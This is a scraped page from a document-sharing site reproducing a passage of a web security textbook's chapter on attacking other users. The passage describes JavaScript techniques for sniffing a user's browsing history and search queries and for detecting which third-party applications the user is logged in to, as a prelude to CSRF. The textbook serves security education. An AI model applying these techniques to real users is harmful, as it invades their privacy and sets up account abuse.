The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

Download 5,76 Mb.

Pdf ko'rish

bet	680/875
Sana	01.01.2022
Hajmi	5,76 Mb.
	#293004

1 ... 676 677 678 679 680 681 682 683 ... 875

Bog'liq
3794 1008 4334

Steal History and Search Queries

JavaScript can be used to perform a brute-force exercise to discover third-

party sites recently visited by the user, and queries that they have performed

on popular search engines. This can be done by dynamically creating hyper-

links for common web sites, and for common search queries, and using the

getComputedStyle

API to test whether the link is colorized as visited or not

visited. A huge list of possible targets can be quickly checked with minimal

impact on the user.

396

Chapter 12

■

Attacking Other Users

70779c12.qxd:WileyRed 9/14/07 3:14 PM Page 396

Enumerate Currently Used Applications

JavaScript can be used to determine whether the user is presently logged in to

third-party web applications. Most applications contain protected pages that

can be viewed only by logged-in users, such as a My Details page. If an unau-

thenticated user requests the page, she receives different content such as an

error message or a redirection to the login.

This behavior can be leveraged to determine whether a user is logged in to

a third-party application. The injected script can issue a request for the pro-

tected page to determine its state. A key constraint here, of course, is

that although the script can make arbitrary requests, it cannot process

the responses, due to the browser’s same origin policy. However, recall that

the same origin policy treats scripts themselves as code rather than data, and

applications are allowed to load and execute scripts from a different domain.

This provides enough of a toehold for an attacker to determine what state the

protected page is in and, therefore, whether the user is logged in.

The trick is to attempt to dynamically load and execute the protected page

as a piece of JavaScript:

window.onerror = fingerprint;

Of course, whatever state the protected page is in, it contains only HTML, so

a JavaScript console error is thrown. Crucially, the console error will contain a

different line number and error type depending on the exact HTML document

returned. The attacker can implement an error handler (in the

fingerprint

function) that checks for the line number and error type that arise when the

user is logged in. Despite the same origin restrictions, the attacker’s script can

thereby deduce what state the protected page is in.

Having determined which popular third-party applications the user is

presently logged in to, the attacker can then carry out highly focused cross-site

request forgery attacks, to perform arbitrary actions within those applications

in the security context of the compromised user (see the “Request Forgery”

section, later in this chapter).

Download 5,76 Mb.

Do'stlaringiz bilan baham:

1 ... 676 677 678 679 680 681 682 683 ... 875